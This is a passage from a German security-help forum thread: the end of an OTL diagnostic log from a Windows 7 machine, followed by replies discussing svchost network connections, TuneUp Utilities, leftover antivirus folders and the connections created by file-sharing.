[2011.03.18 15:49:19 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\MySQL
[2010.06.10 19:31:35 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\OpenOffice.org
[2011.01.11 00:29:50 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Stardock
[2010.06.10 19:31:36 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Thunderbird
[2011.07.30 01:19:41 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\TrueCrypt
[2010.10.06 16:38:00 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\TuneUp Software
[2011.06.23 14:58:10 | 000,032,640 | ---- | M] () -- C:\Windows\Tasks\SCHEDLGU.TXT
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
 
< %ALLUSERSPROFILE%\Application Data\*. >
 
< %ALLUSERSPROFILE%\Application Data\*.exe /s >
 
< %APPDATA%\*. >
[2010.10.06 18:01:56 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\182666AD-6432-4E25-AA4A-6EF9816ECDB3
[2011.07.03 12:57:28 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\3D64BBAF-5217-468D-ABFE-420DF5FE15DC
[2010.11.26 10:10:30 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\5C686C02-B900-402D-A8E4-9B52CE7738CB
[2011.07.05 00:24:28 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\838593B1-C9CF-4405-A557-1C094C97D4B6
[2010.10.18 16:44:10 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Acronis
[2010.10.06 16:58:22 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Adobe
[2010.10.06 16:55:15 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Apple Computer
[2010.10.06 16:37:11 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\ATI
[2010.06.10 19:31:16 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\AVG9
[2010.08.10 16:35:23 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Avira
[2011.08.26 15:55:40 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Azureus
[2011.07.02 18:42:35 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\DAEMON Tools Lite
[2011.01.15 11:59:12 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\DivX
[2010.11.20 18:13:33 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Download Manager
[2010.10.06 16:53:32 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\ESTsoft
[2011.04.09 19:25:06 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\EvaBox
[2010.10.06 16:55:22 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Hardcore
[2011.08.26 02:00:23 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\I2P
[2011.03.23 17:49:46 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\ICQ
[2010.10.23 16:45:02 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\InstallShield
[2010.10.06 16:55:34 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\JavaEditor
[2010.10.06 16:55:22 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Juce VST Host
[2011.09.05 15:50:30 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\KeePass
[2010.06.10 19:31:22 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Macromedia
[2011.09.05 16:33:27 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Malwarebytes
[2011.05.28 21:55:45 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Microsoft
[2011.01.24 00:24:30 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Miranda
[2010.06.10 19:31:26 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Mozilla
[2011.03.18 15:49:19 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\MySQL
[2010.06.10 19:31:35 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\OpenOffice.org
[2011.01.11 00:29:50 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Stardock
[2010.06.10 19:31:36 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Thunderbird
[2011.03.21 18:01:11 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Tor
[2011.07.30 01:19:41 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\TrueCrypt
[2010.10.06 16:38:00 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\TuneUp Software
[2011.03.21 18:01:11 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Vidalia
[2011.08.31 21:57:36 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\vlc
[2011.08.31 19:17:41 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Winamp
[2010.06.13 23:10:09 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\WinRAR
 
< %APPDATA%\*.exe /s >
[2010.10.06 18:01:56 | 003,975,088 | ---- | M] (Acronis) -- C:\Users\..\AppData\Roaming\182666AD-6432-4E25-AA4A-6EF9816ECDB3\afcdpsrv.exe
[2011.08.26 01:37:06 | 000,310,208 | ---- | M] (Georgia Institute of Technology) -- C:\Users\..\AppData\Roaming\Azureus\plugins\mlab\ShaperProbeC.exe
[2011.09.06 00:05:06 | 003,088,032 | ---- | M] (Adobe Systems, Inc.) -- C:\Users\..\AppData\Roaming\Macromedia\Flash Player\www.macromedia.com\bin\fpupdatepl\fpupdatepl.exe
[2010.06.05 20:06:50 | 000,010,134 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{20B1B020-DEAE-48D1-9960-D4C3185D758B}\Foren.exe
[2010.06.05 20:06:50 | 000,000,766 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{20B1B020-DEAE-48D1-9960-D4C3185D758B}\htmledit.exe
[2011.08.01 00:14:25 | 000,022,486 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{4343DB8A-C1BC-4EED-8F51-ADB2C06D2AD2}\ARPPRODUCTICON.exe
[2011.08.01 00:14:25 | 000,022,486 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{4343DB8A-C1BC-4EED-8F51-ADB2C06D2AD2}\NewShortcut1_D2EB7405329E49AFA076CF1C72994A51.exe
[2011.08.01 00:14:25 | 000,022,486 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{4343DB8A-C1BC-4EED-8F51-ADB2C06D2AD2}\NewShortcut2_D2EB7405329E49AFA076CF1C72994A51.exe
[2011.02.25 18:29:54 | 000,045,126 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{57019733-78E6-43DE-8E6D-55349F0FDE6F}\_25838CCE72A1AC2ABE5D8D.exe
[2011.02.25 18:29:54 | 000,045,126 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{57019733-78E6-43DE-8E6D-55349F0FDE6F}\_6FEFF9B68218417F98F549.exe
[2011.02.25 18:29:54 | 000,045,126 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{57019733-78E6-43DE-8E6D-55349F0FDE6F}\_B959C1FE92F059D1BDE1B4.exe
[2010.08.10 17:30:05 | 000,010,134 | R--- | M] () -- C:\Users\..\AppData\Roaming\Microsoft\Installer\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}\ARPPRODUCTICON.exe
[2011.03.23 23:12:55 | 000,188,152 | ---- | M] () -- C:\Users\..\AppData\Roaming\Mozilla\Firefox\Profiles\bf27xuga.default\FlashGot.exe
[2010.08.13 10:13:32 | 000,032,032 | ---- | M] (NOS Microsystems Ltd.) -- C:\Users\..\AppData\Roaming\Mozilla\Firefox\Profiles\bf27xuga.default\extensions\nostmp\content\getPlusPlus_Adobe_reg.exe
 
< %SYSTEMDRIVE%\*.exe >
[2007.11.07 08:44:20 | 000,855,040 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[1999.05.28 09:33:56 | 000,021,468 | ---- | M] (PC-WELT) -- C:\pcwkill.exe
 
 
< MD5 for: AGP440.SYS  >
[2009.07.14 03:52:21 | 000,061,008 | ---- | M] (Microsoft Corporation) MD5=608C14DBA7299D8CB6ED035A68A15799 -- C:\Windows\SysNative\drivers\AGP440.sys
[2009.07.14 03:52:21 | 000,061,008 | ---- | M] (Microsoft Corporation) MD5=608C14DBA7299D8CB6ED035A68A15799 -- C:\Windows\SysNative\DriverStore\FileRepository\machine.inf_amd64_neutral_a2f120466549d68b\AGP440.sys
[2009.07.14 03:52:21 | 000,061,008 | ---- | M] (Microsoft Corporation) MD5=608C14DBA7299D8CB6ED035A68A15799 -- C:\Windows\winsxs\amd64_machine.inf_31bf3856ad364e35_6.1.7600.16385_none_1607dee2d861e021\AGP440.sys
[2009.07.14 03:52:21 | 000,061,008 | ---- | M] (Microsoft Corporation) MD5=608C14DBA7299D8CB6ED035A68A15799 -- C:\Windows\winsxs\amd64_machine.inf_31bf3856ad364e35_6.1.7601.17514_none_1838f2aad55063bb\AGP440.sys
 
< MD5 for: ATAPI.SYS  >
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\drivers\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_neutral_aad30bdeec04ea5e\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_392d19c13b3ad543\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_3b5e2d89382958dd\atapi.sys
 
< MD5 for: CNGAUDIT.DLL  >
[2009.07.14 03:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\SysWOW64\cngaudit.dll
[2009.07.14 03:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_e83a414890e8132b\cngaudit.dll
[2009.07.14 03:40:20 | 000,018,944 | ---- | M] (Microsoft Corporation) MD5=86FE1B1F8FD42CD0DB641AB1CDB13093 -- C:\Windows\SysNative\cngaudit.dll
[2009.07.14 03:40:20 | 000,018,944 | ---- | M] (Microsoft Corporation) MD5=86FE1B1F8FD42CD0DB641AB1CDB13093 -- C:\Windows\winsxs\amd64_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_4458dccc49458461\cngaudit.dll
 
< MD5 for: EVENTLOG.DLL  >
[2009.12.20 00:00:00 | 000,037,520 | ---- | M] (perl.org) MD5=2852D57385C4709EAAE2F9DB01AD3672 -- C:\xampp\perl\site\lib\auto\Win32\EventLog\EventLog.dll
 
< MD5 for: IASTOR.SYS  >
[2009.06.05 03:54:36 | 000,408,600 | ---- | M] (Intel Corporation) MD5=1D004CB1DA6323B1F55CAEF7F94B61D9 -- C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\driver64\IaStor.sys
[2009.06.05 03:54:36 | 000,408,600 | ---- | M] (Intel Corporation) MD5=1D004CB1DA6323B1F55CAEF7F94B61D9 -- C:\Windows\SysNative\drivers\iaStor.sys
[2009.06.05 03:54:36 | 000,408,600 | ---- | M] (Intel Corporation) MD5=1D004CB1DA6323B1F55CAEF7F94B61D9 -- C:\Windows\SysNative\DriverStore\FileRepository\iaahci.inf_amd64_neutral_7fb62b08f6b7117a\iaStor.sys
[2009.06.05 03:43:16 | 000,330,264 | ---- | M] (Intel Corporation) MD5=D483687EACE0C065EE772481A96E05F5 -- C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\driver\IaStor.sys
 
< MD5 for: IASTORV.SYS  >
[2010.11.20 15:33:38 | 000,410,496 | ---- | M] (Intel Corporation) MD5=3DF4395A7CF8B7A72A5F4606366B8C2D -- C:\Windows\SysNative\DriverStore\FileRepository\iastorv.inf_amd64_neutral_668286aa35d55928\iaStorV.sys
[2010.11.20 15:33:38 | 000,410,496 | ---- | M] (Intel Corporation) MD5=3DF4395A7CF8B7A72A5F4606366B8C2D -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7601.17514_none_0d3757e79e6784d0\iaStorV.sys
[2011.03.11 08:19:16 | 000,410,496 | ---- | M] (Intel Corporation) MD5=5B3DE7208E5000D5B451B9D290D2579C -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7601.21680_none_0d714416b7c182d5\iaStorV.sys
[2011.03.11 08:41:26 | 000,410,496 | ---- | M] (Intel Corporation) MD5=AAAF44DB3BD0B9D1FB6969B23ECC8366 -- C:\Windows\SysNative\drivers\iaStorV.sys
[2011.03.11 08:41:26 | 000,410,496 | ---- | M] (Intel Corporation) MD5=AAAF44DB3BD0B9D1FB6969B23ECC8366 -- C:\Windows\SysNative\DriverStore\FileRepository\iastorv.inf_amd64_neutral_0bcee2057afcc090\iaStorV.sys
[2011.03.11 08:41:26 | 000,410,496 | ---- | M] (Intel Corporation) MD5=AAAF44DB3BD0B9D1FB6969B23ECC8366 -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7601.17577_none_0cf9793d9e95787b\iaStorV.sys
[2011.03.11 08:23:00 | 000,410,496 | ---- | M] (Intel Corporation) MD5=B75E45C564E944A2657167D197AB29DA -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7600.16778_none_0b141c81a16e25e6\iaStorV.sys
[2011.03.11 08:25:49 | 000,410,496 | ---- | M] (Intel Corporation) MD5=BFDC9D75698800CFE4D1698BF2750EA2 -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7600.20921_none_0bccc8c8ba6985c1\iaStorV.sys
[2009.07.14 03:48:04 | 000,410,688 | ---- | M] (Intel Corporation) MD5=D83EFB6FD45DF9D55E9A1AFC63640D50 -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7600.16385_none_0b06441fa1790136\iaStorV.sys
 
< MD5 for: NETLOGON.DLL  >
[2009.07.14 03:41:52 | 000,692,736 | ---- | M] (Microsoft Corporation) MD5=956D030D375F207B22FB111E06EF9C35 -- C:\Windows\winsxs\amd64_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7600.16385_none_59aca8ea51aaeefe\netlogon.dll
[2010.11.20 15:27:22 | 000,695,808 | ---- | M] (Microsoft Corporation) MD5=AA339DD8BB128EF66660DFBBB59043D3 -- C:\Windows\SysNative\netlogon.dll
[2010.11.20 15:27:22 | 000,695,808 | ---- | M] (Microsoft Corporation) MD5=AA339DD8BB128EF66660DFBBB59043D3 -- C:\Windows\winsxs\amd64_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_5bddbcb24e997298\netlogon.dll
[2010.11.20 14:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\SysWOW64\netlogon.dll
[2010.11.20 14:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\winsxs\wow64_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_6632670482fa3493\netlogon.dll
[2009.07.14 03:16:02 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=EAA75D9000B71F10EEC04D2AE6C60E81 -- C:\Windows\winsxs\wow64_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7600.16385_none_6401533c860bb0f9\netlogon.dll
 
< MD5 for: NVSTOR.SYS  >
[2009.07.14 03:45:45 | 000,167,488 | ---- | M] (NVIDIA Corporation) MD5=477DC4D6DEB99BE37084C9AC6D013DA1 -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7600.16385_none_95cfb4ced8afab0e\nvstor.sys
[2011.03.11 08:23:06 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=6C1D5F70E7A6A3FD1C90D840EDC048B9 -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7600.16778_none_95dd8d30d8a4cfbe\nvstor.sys
[2011.03.11 08:25:53 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=AE274836BA56518E279087363A781214 -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7600.20921_none_96963977f1a02f99\nvstor.sys
[2011.03.11 08:19:21 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=D23C7E8566DA2B8A7C0DBBB761D54888 -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7601.21680_none_983ab4c5eef82cad\nvstor.sys
[2011.03.11 08:41:34 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=DAB0E87525C10052BF65F06152F37E4A -- C:\Windows\SysNative\drivers\nvstor.sys
[2011.03.11 08:41:34 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=DAB0E87525C10052BF65F06152F37E4A -- C:\Windows\SysNative\DriverStore\FileRepository\nvraid.inf_amd64_neutral_0276fc3b3ea60d41\nvstor.sys
[2011.03.11 08:41:34 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=DAB0E87525C10052BF65F06152F37E4A -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7601.17577_none_97c2e9ecd5cc2253\nvstor.sys
[2010.11.20 15:33:48 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=F7CD50FE7139F07E77DA8AC8033D1832 -- C:\Windows\SysNative\DriverStore\FileRepository\nvraid.inf_amd64_neutral_dd659ed032d28a14\nvstor.sys
[2010.11.20 15:33:48 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=F7CD50FE7139F07E77DA8AC8033D1832 -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_9800c896d59e2ea8\nvstor.sys
 
< MD5 for: SCECLI.DLL  >
[2009.07.14 03:16:13 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=26073302DAEA83CC5B944C546D6B47D2 -- C:\Windows\winsxs\wow64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_9e577e55272d37b4\scecli.dll
[2009.07.14 03:41:53 | 000,232,448 | ---- | M] (Microsoft Corporation) MD5=398712DDDAEFB85EDF61DF6A07B65C79 -- C:\Windows\winsxs\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_9402d402f2cc75b9\scecli.dll
[2010.11.20 14:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\SysWOW64\scecli.dll
[2010.11.20 14:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\winsxs\wow64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_a088921d241bbb4e\scecli.dll
[2010.11.20 15:27:25 | 000,232,960 | ---- | M] (Microsoft Corporation) MD5=ED78427259134C63ED69804D2132B86C -- C:\Windows\SysNative\scecli.dll
[2010.11.20 15:27:25 | 000,232,960 | ---- | M] (Microsoft Corporation) MD5=ED78427259134C63ED69804D2132B86C -- C:\Windows\winsxs\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_9633e7caefbaf953\scecli.dll
 
< MD5 for: USER32.DLL  >
[2010.11.20 14:08:57 | 000,833,024 | ---- | M] (Microsoft Corporation) MD5=5E0DB2D8B2750543CD2EBB9EA8E6CDD3 -- C:\Windows\SysWOW64\user32.dll
[2010.11.20 14:08:57 | 000,833,024 | ---- | M] (Microsoft Corporation) MD5=5E0DB2D8B2750543CD2EBB9EA8E6CDD3 -- C:\Windows\winsxs\wow64_microsoft-windows-user32_31bf3856ad364e35_6.1.7601.17514_none_35b31c02b85ccb6e\user32.dll
[2009.07.14 03:41:56 | 001,008,640 | ---- | M] (Microsoft Corporation) MD5=72D7B3EA16946E8F0CF7458150031CC6 -- C:\Windows\winsxs\amd64_microsoft-windows-user32_31bf3856ad364e35_6.1.7600.16385_none_292d5de8870d85d9\user32.dll
[2009.07.14 03:11:24 | 000,833,024 | ---- | M] (Microsoft Corporation) MD5=E8B0FFC209E504CB7E79FC24E6C085F0 -- C:\Windows\winsxs\wow64_microsoft-windows-user32_31bf3856ad364e35_6.1.7600.16385_none_3382083abb6e47d4\user32.dll
[2010.11.20 15:27:27 | 001,008,128 | ---- | M] (Microsoft Corporation) MD5=FE70103391A64039A921DBFFF9C7AB1B -- C:\Windows\SysNative\user32.dll
[2010.11.20 15:27:27 | 001,008,128 | ---- | M] (Microsoft Corporation) MD5=FE70103391A64039A921DBFFF9C7AB1B -- C:\Windows\winsxs\amd64_microsoft-windows-user32_31bf3856ad364e35_6.1.7601.17514_none_2b5e71b083fc0973\user32.dll
 
< MD5 for: USERINIT.EXE  >
[2010.11.20 14:17:48 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\SysWOW64\userinit.exe
[2010.11.20 14:17:48 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_de3024012ff21116\userinit.exe
[2009.07.14 03:14:43 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=6DE80F60D7DE9CE6B8C2DDFDF79EF175 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7600.16385_none_dbff103933038d7c\userinit.exe
[2009.07.14 03:39:48 | 000,030,208 | ---- | M] (Microsoft Corporation) MD5=6F8F1376A13114CC10C0E69274F5A4DE -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7600.16385_none_381dabbceb60feb2\userinit.exe
[2010.11.20 15:25:24 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\SysNative\userinit.exe
[2010.11.20 15:25:24 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_3a4ebf84e84f824c\userinit.exe
 
< MD5 for: WININIT.EXE  >
[2009.07.14 03:39:52 | 000,129,024 | ---- | M] (Microsoft Corporation) MD5=94355C28C1970635A31B3FE52EB7CEBA -- C:\Windows\SysNative\wininit.exe
[2009.07.14 03:39:52 | 000,129,024 | ---- | M] (Microsoft Corporation) MD5=94355C28C1970635A31B3FE52EB7CEBA -- C:\Windows\winsxs\amd64_microsoft-windows-wininit_31bf3856ad364e35_6.1.7600.16385_none_8ce7aa761e01ad49\wininit.exe
[2009.07.14 03:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\SysWOW64\wininit.exe
[2009.07.14 03:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\winsxs\x86_microsoft-windows-wininit_31bf3856ad364e35_6.1.7600.16385_none_30c90ef265a43c13\wininit.exe
 
< MD5 for: WINLOGON.EXE  >
[2010.11.20 15:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\SysNative\winlogon.exe
[2010.11.20 15:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2009.07.14 03:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16385_none_cbb7f2bdeea2829c\winlogon.exe
[2009.10.28 09:01:57 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=A93D41A4D4B0D91C072D11DD8AF266DE -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.20560_none_cc522fd507b468f8\winlogon.exe
[2009.10.28 08:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16447_none_cbe534e7ee8042ad\winlogon.exe
 
< MD5 for: WS2IFSL.SYS  >
[2009.07.14 02:10:33 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=6BCC1D7D2FD2453957C5479A32364E52 -- C:\Windows\SysNative\drivers\ws2ifsl.sys
[2009.07.14 02:10:33 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=6BCC1D7D2FD2453957C5479A32364E52 -- C:\Windows\winsxs\amd64_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.1.7600.16385_none_ab7b927be17eace8\ws2ifsl.sys
 
< %systemroot%\system32\drivers\*.sys /lockedfiles >
 
< %systemroot%\System32\config\*.sav >
 
< %systemroot%\*. /mp /s >
 
< %systemroot%\system32\*.dll /lockedfiles >

< End of report >

--- --- ---
Sieht aber alles nicht wirklich infiziert aus, außer es hat sich irgendetwas sehr gut versteckt irgendwo eingenistet. Ich hab mal im Ressourcen Manager die Internet Verbindungen angeguckt und frage mich, wieso das System und die svchost.exe so viele Verbindungen zu externen IP Adressen aufbauen -.-

cosinus · 06.09.2011, 07:29

Zitat:

die svchost.exe so viele Verbindungen zu externen IP Adressen aufbauen -.-

Wie ich schon sagte ist svchost ein Hüllenprozess

Man müsste mit nem svchost-Analyzer nachsehen, was genau sich hinter einer svchost-Instanz verbirgt. Evtl. hilft da auch schon der ProcessExplorer von MS.
Und auch das mit dem SYSTEM-Prozess ist normal.

Zitat:

SRV - (TuneUp.UtilitiesSvc) -- C:\Program Files (x86)\TuneUp Utilities 2010\TuneUpUtilitiesService64.exe (TuneUp Software)
SRV - (UxTuneUp) -- C:\Windows\SysWOW64\uxtuneup.dll (TuneUp Software)

Wozu dieses riskante und unnötige Schlangenöl? Warum muss man für mehr oder weniger hübsch verpackte Windows-Bordmittel Geld ausgeben? Und unbedingt die Funktion "Registry-Bereinigung" sein lassen!

Zitat:

[2010.06.10 19:31:16 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\AVG9

Reste von AVG? Soweit ich gesehen habe, nutzt du AntiVir. Zwei Virenscanner parallel sind meistens nicht gut.

Zitat:

[2011.08.26 15:55:40 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Azureus

Ähem, Filesharing erzeugt erst recht viele Verbindungen, also muss man sich da nicht wundern.
Beachte, dass Filesharing generell ein Risiko darstellt, je nachdem was für Software man sich da zieht. Es ist völlig i.O. wenn man zB sich Linuximages über die vom Distributor zur Verfügung gestellten Torrents runterlädt, etwas ganz anderes ist es, wenn man sich diverese illegale Software mit Cracks und Keygen "besorgt"

N33DH33LP · 06.09.2011, 17:42

Zitat:

Zitat von cosinus

Wie ich schon sagte ist svchost ein Hüllenprozess

Man müsste mit nem svchost-Analyzer nachsehen, was genau sich hinter einer svchost-Instanz verbirgt. Evtl. hilft da auch schon der ProcessExplorer von MS.
Und auch das mit dem SYSTEM-Prozess ist normal.

Meinst so ein Tool z.B hxxp://www.heise.de/software/download/svchost_process_analyzer/70847 ?
Habe damit mal den Prozess analysiert, habe aber nichts besonderes gefunden, sind halt die ganzen Dienste drin, die ich auch in der Verwaltung mir angucken kann, was mich aber wundert, ist, dass die meisten *.dll Dateien von dem Programm nicht gefunden werden. Kann es sein, dass das Programm mit 64Bit Betriebssystemen nicht klar kommt und die .dll Dateien eigentlich woanders z.B im Ordner SysWOW64 liegen?

Zitat:

Zitat von cosinus

Wozu dieses riskante und unnötige Schlangenöl? Warum muss man für mehr oder weniger hübsch verpackte Windows-Bordmittel Geld ausgeben? Und unbedingt die Funktion "Registry-Bereinigung" sein lassen!

Benutze TuneUp, auch wenn es sich ziemlich blöd anhört nur um mein Win7 Design zu verändern. Da man dort auf eine große Datenbank von Designs und Icons Zugriff hat. Ansonsten ist es Müll, da hast du Recht.
CCleaner und CCenhancer reichen zum PC säubern.

Zitat:

Zitat von cosinus

Reste von AVG? Soweit ich gesehen habe, nutzt du AntiVir. Zwei Virenscanner parallel sind meistens nicht gut.

